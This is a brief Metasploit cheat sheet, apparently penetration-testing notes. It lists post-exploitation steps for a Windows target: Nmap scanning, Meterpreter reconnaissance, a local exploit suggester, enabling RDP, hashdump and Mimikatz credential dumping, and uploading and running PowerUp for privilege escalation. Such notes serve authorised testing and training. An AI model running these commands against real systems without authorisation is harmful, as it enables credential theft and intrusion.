Metasploit
# Nmap version scan; db_nmap stores the results in the Metasploit database (see hosts/services below)
db_nmap -sV [IP]
hosts
services
vulns
sessions -i [session_id]
meterpreter > getuid
meterpreter > getprivs
meterpreter > sysinfo
meterpreter > ipconfig
# Is the target running in a VM?
meterpreter > run post/windows/gather/checkvm
# Any applicable local exploits?
meterpreter > run post/multi/recon/local_exploit_suggester
# Enable RDP
meterpreter > run post/windows/manage/enable_rdp
meterpreter > hashdump
# Mimikatz (kiwi extension)
load kiwi
# PowerShell: upload and run PowerUp
meterpreter > upload /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1
[*] uploading : /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 -> PowerUp.ps1
[*] Uploaded 483.72 KiB of 483.72 KiB (100.0%): /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 -> PowerUp.ps1
[*] uploaded : /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 -> PowerUp.ps1
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks